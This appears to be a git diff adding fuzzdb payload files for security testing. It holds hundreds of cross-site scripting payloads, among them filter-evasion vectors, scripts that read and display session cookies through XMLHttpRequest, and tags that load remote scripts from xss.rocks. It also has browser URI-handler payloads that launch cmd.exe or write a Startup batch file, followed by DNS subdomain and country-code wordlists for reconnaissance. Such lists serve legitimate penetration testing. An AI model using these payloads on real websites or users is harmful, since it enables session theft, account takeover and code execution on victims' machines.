<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
||||
<iframe/onreadystatechange=alert(1)
|
||||
<iframe/src \/\/onload = prompt(1)
|
||||
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
||||
<IMG onmouseover="alert('xxs')">
|
||||
<img src ?itworksonchrome?\/onerror = alert(1)???
|
||||
<IMG SRC= onmouseover="alert('xxs')">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<img src="/" =_=" title="onerror='prompt(1)'">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
||||
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<img src="javascript:alert('XSS')">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<img src=`xx:xx`onerror=alert(1)>
|
||||
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
|
||||
<IMG SRC=java%00script:alert(\"XSS\")>
|
||||
<img src=x onerror="javascript:alert('XSS')">
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
|
||||
<input value=<><iframe/src=javascript:confirm(1)
|
||||
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
|
||||
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||
<object data=javascript:\u0061le%72t(1)>
|
||||
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
||||
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
|
||||
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
|
||||
<script src="data:text/javascript,alert(1)"></script>
|
||||
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
||||
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
|
||||
<script x> alert(1) </script 1=2
|
||||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
||||
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<script/src=data:text/javascript,alert(1)></script> ?
|
||||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
|
||||
<SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
|
||||
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
|
||||
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
|
||||
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
|
||||
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
|
||||
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
|
||||
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
|
||||
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
|
||||
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
|
||||
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
|
||||
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
|
||||
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
||||
<script>+-+-1-+-+alert(1)</script>
|
||||
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||
<script>alert(document.head.childNodes[3].text)</script>
|
||||
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||
<script>alert('XSS');</script>
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
|
||||
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
|
||||
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
|
||||
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
|
||||
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
|
||||
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||
<svg contentScriptType=text/vbs><script>MsgBox+1
|
||||
<svg/onload=alert(1)
|
||||
<svg><script ?>alert(1)
|
||||
<svg><script onlypossibleinopera:-)> alert(1)
|
||||
<svg><script>//
confirm(1);</script </svg>
|
||||
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
||||
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
||||
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
||||
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||
alert
|
||||
alert(1)
|
||||
alert(1)
|
||||
alert\\`1\\`
|
||||
alert`1`
|
||||
<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||
http://www.<script>alert(1)</script .com
|
||||
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
|
||||
javascript:alert%28/xss/%29
|
||||
javascript:alert(1)
|
||||
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
|
||||
x”</title><img src%3dx onerror%3dalert(1)>
|
78
attack/xss/xss-rsnake.txt
Normal file
78
attack/xss/xss-rsnake.txt
Normal file
|
@ -0,0 +1,78 @@
|
|||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG 6;avascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
|
||||
<IMG SRC=java%00script:alert(\"XSS\")>
|
||||
<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>
|
||||
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT SRC=http://xss.rocks/xss.js?<B>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<LAYER SRC="http://xss.rocks/scriptlet.html"></LAYER>
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
|
||||
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG SRC="mocha:[code]">
|
||||
<IMG SRC="livescript:[code]">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML SRC="http:/xss.rocks/xsstest.xml" ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.rocks/xss.js></SCRIPT>'"-->
|
||||
<? echo('<SCR)';
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT a=">" SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://xss.rocks/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="xss.rocks/xss.js"></SCRIPT>
|
||||
|
||||
|
6
attack/xss/xss-uri.txt
Normal file
6
attack/xss/xss-uri.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
||||
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
||||
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
||||
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
||||
firefoxurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
||||
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
2463
discovery/UserAgent/UserAgents.txt
Normal file
2463
discovery/UserAgent/UserAgents.txt
Normal file
File diff suppressed because it is too large
Load diff
257
discovery/dns/CcTLD.txt
Normal file
257
discovery/dns/CcTLD.txt
Normal file
|
@ -0,0 +1,257 @@
|
|||
ac
|
||||
ad
|
||||
ae
|
||||
af
|
||||
ag
|
||||
ai
|
||||
al
|
||||
am
|
||||
an
|
||||
ao
|
||||
aq
|
||||
ar
|
||||
as
|
||||
at
|
||||
au
|
||||
aw
|
||||
ax
|
||||
az
|
||||
ba
|
||||
bb
|
||||
bd
|
||||
be
|
||||
bf
|
||||
bg
|
||||
bh
|
||||
bi
|
||||
bj
|
||||
bl
|
||||
bm
|
||||
bn
|
||||
bo
|
||||
bq
|
||||
br
|
||||
bs
|
||||
bt
|
||||
bv
|
||||
bw
|
||||
by
|
||||
bz
|
||||
ca
|
||||
cc
|
||||
cd
|
||||
cf
|
||||
cg
|
||||
ch
|
||||
ci
|
||||
ck
|
||||
cl
|
||||
cm
|
||||
cn
|
||||
co
|
||||
cr
|
||||
cu
|
||||
cv
|
||||
cw
|
||||
cx
|
||||
cy
|
||||
cz
|
||||
dd
|
||||
de
|
||||
dj
|
||||
dk
|
||||
dm
|
||||
do
|
||||
dz
|
||||
ec
|
||||
ee
|
||||
eg
|
||||
eh
|
||||
er
|
||||
es
|
||||
et
|
||||
eu
|
||||
fi
|
||||
fj
|
||||
fk
|
||||
fm
|
||||
fo
|
||||
fr
|
||||
ga
|
||||
gb
|
||||
gd
|
||||
ge
|
||||
gf
|
||||
gg
|
||||
gh
|
||||
gi
|
||||
gl
|
||||
gm
|
||||
gn
|
||||
gp
|
||||
gq
|
||||
gr
|
||||
gs
|
||||
gt
|
||||
gu
|
||||
gw
|
||||
gy
|
||||
hk
|
||||
hm
|
||||
hn
|
||||
hr
|
||||
ht
|
||||
hu
|
||||
id
|
||||
ie
|
||||
il
|
||||
im
|
||||
in
|
||||
io
|
||||
iq
|
||||
ir
|
||||
is
|
||||
it
|
||||
je
|
||||
jm
|
||||
jo
|
||||
jp
|
||||
ke
|
||||
kg
|
||||
kh
|
||||
ki
|
||||
km
|
||||
kn
|
||||
kp
|
||||
kr
|
||||
kw
|
||||
ky
|
||||
kz
|
||||
la
|
||||
lb
|
||||
lc
|
||||
li
|
||||
lk
|
||||
lr
|
||||
ls
|
||||
lt
|
||||
lu
|
||||
lv
|
||||
ly
|
||||
ma
|
||||
mc
|
||||
md
|
||||
me
|
||||
mf
|
||||
mg
|
||||
mh
|
||||
mk
|
||||
ml
|
||||
mm
|
||||
mn
|
||||
mo
|
||||
mp
|
||||
mq
|
||||
mr
|
||||
ms
|
||||
mt
|
||||
mu
|
||||
mv
|
||||
mw
|
||||
mx
|
||||
my
|
||||
mz
|
||||
na
|
||||
nc
|
||||
ne
|
||||
nf
|
||||
ng
|
||||
ni
|
||||
nl
|
||||
no
|
||||
np
|
||||
nr
|
||||
nu
|
||||
nz
|
||||
om
|
||||
pa
|
||||
pe
|
||||
pf
|
||||
pg
|
||||
ph
|
||||
pk
|
||||
pl
|
||||
pm
|
||||
pn
|
||||
pr
|
||||
ps
|
||||
pt
|
||||
pw
|
||||
py
|
||||
qa
|
||||
re
|
||||
ro
|
||||
rs
|
||||
ru
|
||||
rw
|
||||
sa
|
||||
sb
|
||||
sc
|
||||
sd
|
||||
se
|
||||
sg
|
||||
sh
|
||||
si
|
||||
sj
|
||||
sk
|
||||
sl
|
||||
sm
|
||||
sn
|
||||
so
|
||||
sr
|
||||
ss
|
||||
st
|
||||
su
|
||||
sv
|
||||
sx
|
||||
sy
|
||||
sz
|
||||
tc
|
||||
td
|
||||
tf
|
||||
tg
|
||||
th
|
||||
tj
|
||||
tk
|
||||
tl
|
||||
tm
|
||||
tn
|
||||
to
|
||||
tp
|
||||
tr
|
||||
tt
|
||||
tv
|
||||
tw
|
||||
tz
|
||||
ua
|
||||
ug
|
||||
uk
|
||||
um
|
||||
us
|
||||
uy
|
||||
uz
|
||||
va
|
||||
vc
|
||||
ve
|
||||
vg
|
||||
vi
|
||||
vn
|
||||
vu
|
||||
wf
|
||||
ws
|
||||
ye
|
||||
yt
|
||||
yu
|
||||
za
|
||||
zm
|
||||
zw
|
50000
discovery/dns/alexaTop1mAXFRcommonSubdomains.txt
Normal file
50000
discovery/dns/alexaTop1mAXFRcommonSubdomains.txt
Normal file
File diff suppressed because it is too large
Load diff
989
discovery/dns/dnsmapCommonSubdomains.txt
Normal file
989
discovery/dns/dnsmapCommonSubdomains.txt
Normal file
|
@ -0,0 +1,989 @@
|
|||
a
|
||||
aa
|
||||
ab
|
||||
ac
|
||||
access
|
||||
accounting
|
||||
accounts
|
||||
ad
|
||||
admin
|
||||
administrator
|
||||
ae
|
||||
af
|
||||
ag
|
||||
ah
|
||||
ai
|
||||
aix
|
||||
aj
|
||||
ak
|
||||
al
|
||||
am
|
||||
an
|
||||
ao
|
||||
ap
|
||||
apollo
|
||||
aq
|
||||
ar
|
||||
archivos
|
||||
as
|
||||
at
|
||||
au
|
||||
aula
|
||||
aulas
|
||||
av
|
||||
aw
|
||||
ax
|
||||
ay
|
||||
ayuda
|
||||
az
|
||||
b
|
||||
ba
|
||||
backup
|
||||
backups
|
||||
bart
|
||||
bb
|
||||
bc
|
||||
bd
|
||||
be
|
||||
beta
|
||||
bf
|
||||
bg
|
||||
bh
|
||||
bi
|
||||
biblioteca
|
||||
billing
|
||||
bj
|
||||
bk
|
||||
bl
|
||||
blackboard
|
||||
blog
|
||||
blogs
|
||||
bm
|
||||
bn
|
||||
bo
|
||||
bp
|
||||
bq
|
||||
br
|
||||
bs
|
||||
bsd
|
||||
bt
|
||||
bu
|
||||
bv
|
||||
bw
|
||||
bx
|
||||
by
|
||||
bz
|
||||
c
|
||||
ca
|
||||
carro
|
||||
cart
|
||||
cas
|
||||
catalog
|
||||
catalogo
|
||||
catalogue
|
||||
cb
|
||||
cc
|
||||
cd
|
||||
ce
|
||||
cf
|
||||
cg
|
||||
ch
|
||||
chat
|
||||
chimera
|
||||
chronos
|
||||
ci
|
||||
citrix
|
||||
cj
|
||||
ck
|
||||
cl
|
||||
classroom
|
||||
clientes
|
||||
clients
|
||||
cm
|
||||
cn
|
||||
co
|
||||
connect
|
||||
controller
|
||||
correoweb
|
||||
cp
|
||||
cpanel
|
||||
cq
|
||||
cr
|
||||
cs
|
||||
csg
|
||||
ct
|
||||
cu
|
||||
customers
|
||||
cv
|
||||
cw
|
||||
cx
|
||||
cy
|
||||
cz
|
||||
d
|
||||
da
|
||||
data
|
||||
db
|
||||
dbs
|
||||
dc
|
||||
dd
|
||||
de
|
||||
demo
|
||||
demon
|
||||
demostration
|
||||
descargas
|
||||
developers
|
||||
development
|
||||
df
|
||||
dg
|
||||
dh
|
||||
di
|
||||
diana
|
||||
directory
|
||||
dj
|
||||
dk
|
||||
dl
|
||||
dm
|
||||
dmz
|
||||
dn
|
||||
do
|
||||
domain
|
||||
domaincontroller
|
||||
domain-controller
|
||||
download
|
||||
downloads
|
||||
dp
|
||||
dq
|
||||
dr
|
||||
ds
|
||||
dt
|
||||
du
|
||||
dv
|
||||
dw
|
||||
dx
|
||||
dy
|
||||
dz
|
||||
e
|
||||
ea
|
||||
eaccess
|
||||
eb
|
||||
ec
|
||||
ed
|
||||
ee
|
||||
ef
|
||||
eg
|
||||
eh
|
||||
ei
|
||||
ej
|
||||
ejemplo
|
||||
ejemplos
|
||||
ek
|
||||
el
|
||||
em
|
||||
email
|
||||
en
|
||||
enrutador
|
||||
eo
|
||||
ep
|
||||
eq
|
||||
er
|
||||
es
|
||||
et
|
||||
eu
|
||||
ev
|
||||
eventos
|
||||
events
|
||||
ew
|
||||
ex
|
||||
example
|
||||
examples
|
||||
exchange
|
||||
extranet
|
||||
ey
|
||||
ez
|
||||
f
|
||||
fa
|
||||
fb
|
||||
fc
|
||||
fd
|
||||
fe
|
||||
ff
|
||||
fg
|
||||
fh
|
||||
fi
|
||||
files
|
||||
finance
|
||||
firewall
|
||||
fj
|
||||
fk
|
||||
fl
|
||||
fm
|
||||
fn
|
||||
fo
|
||||
foro
|
||||
foros
|
||||
forum
|
||||
forums
|
||||
fp
|
||||
fq
|
||||
fr
|
||||
freebsd
|
||||
fs
|
||||
ft
|
||||
ftp
|
||||
ftpd
|
||||
fu
|
||||
fv
|
||||
fw
|
||||
fx
|
||||
fy
|
||||
fz
|
||||
g
|
||||
ga
|
||||
galeria
|
||||
gallery
|
||||
gateway
|
||||
gb
|
||||
gc
|
||||
gd
|
||||
ge
|
||||
gf
|
||||
gg
|
||||
gh
|
||||
gi
|
||||
gilford
|
||||
gj
|
||||
gk
|
||||
gl
|
||||
gm
|
||||
gn
|
||||
go
|
||||
gp
|
||||
gq
|
||||
gr
|
||||
groups
|
||||
groupwise
|
||||
gs
|
||||
gt
|
||||
gu
|
||||
guest
|
||||
guia
|
||||
guide
|
||||
gv
|
||||
gw
|
||||
gx
|
||||
gy
|
||||
gz
|
||||
h
|
||||
ha
|
||||
hb
|
||||
hc
